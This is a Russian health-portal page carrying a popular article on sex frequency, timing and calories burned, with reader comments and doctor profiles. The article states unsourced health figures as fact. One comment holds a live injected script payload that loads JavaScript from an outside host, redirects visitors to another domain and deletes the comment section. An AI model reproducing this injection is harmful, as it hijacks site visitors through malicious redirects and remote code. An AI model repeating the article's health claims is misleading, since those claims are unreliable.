Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 цифры для секса  >>  3 цифры для секса
 
Обратная связь
 

3 цифры для секса

Размер шрифта
10 января 2012 08:00
  • google_analytics: false
  • Нравится

Часто ли надо заниматься сексом, в котором часу это делать лучше всего и какое количество калорий при этом можно сжечь? Всего три цифры – и оргазм вам обеспечен!

Два раза в неделю надо заниматься сексом.

Регулярные эякуляции (при занятии сексом два раза в неделю) способствуют профилактике застоя спермы, стимулируют обновление сперматозоидов, а также улучшают их подвижность. Причина тому – особое вещество ПСА. В норме оно разжижает сперму.

Секс защищает от инфаркта миокарда. Это отменная тренировка сердечного кровообращения. У мужчин, которые занимаются сексом два раза в неделю или чаще, вероятность инфаркта и инсульта снижается вдвое.

Непосредственно перед оргазмом уровень гормона окситоцина повышается в пять раз по сравнению с его обычным уровнем. Это приводит к образованию эндорфинов, которые оказывают болеутоляющий эффект при головной боли и даже при мигрени. У женщин занятия сексом два раза в неделю также приводят к выбросу эстрогена, снимающий неприятные ощущения во время предменструального периода. 

У людей, которые занимаются сексом два и более раза в неделю, количество иммуноглобулина А на 30% выше, а значит, укрепляется иммунная система. 

6 часов утра – лучшее время для занятий сексом.

Несмотря на то, что сексуальные биоритмы мужчин и женщин не совпадают, есть время суток, когда они приходят в соответствие. Это время – 6 часов утра. Именно в этот час мужская и женская кривые сексуальности достигают максимума. Все дело в гормонах, в первую очередь, в гормоне мелатонине. Это гормон вырабатывается шишковидной железой, расположенной в центре нашего мозга, в ночное время как реакция на темноту. Максимального уровня мелантонин достигает в середине ночи, постепенно снижаясь к утру.

С наступлением темноты наш организм начинает готовиться ко сну. А либидо снижается.

В 6-7 утра его уровень снижается, а у мужчин к тому же повышается секреция главного полового гормона – тестостерона.

Утром же идет активная выработка серотонина, гормона удовольствия и хорошего настроения.

 

Сколько калорий можно потерять во время занятия сексом?

Потеря калорий при сексе составляет от 200 ккал за 20 минут. Это равнозначно 30 минутам в бассейне, 13 кусочкам сахара или 2 бутербродам с маслом.

При поцелуе расходуется 90 ккал, на оргазм уходит – 25 ккал, а на его имитацию – целых 160 ккал.


Сюжеты по теме:
3 цифры для секса

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

27 января 2012 в 13:01

Цитировать   |   Пожаловаться

куда дели все комментарии без объяснений?

2 - Гость

01 февраля 2012 в 11:45

Цитировать   |   Пожаловаться

Да, страшно полезная статья, особенно про потерю калорий при ИМИТАЦИИ ОРГАЗМА! Особенно она полезна подавляющему большинству женщин, которым надо рано утром на работу вставать, собрать детей в садик-школу, вечером продукты закупить, сготовить еду на ужин и на завтра на обед взять с собой, убраться, проверить уроки, и т.д. И тут как тут муж со своей подвижностью сперматозоидов.... Да не пошел ли он... Мне потолстение не грозит с таким графиком жизни, как и многим женщинам у нас в России.
А со своими сперматозоизами и сексом мужчины уж как нибудь сами пусть разбираются: дети уже есть и больше не надо, худеть не требуется!

3 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.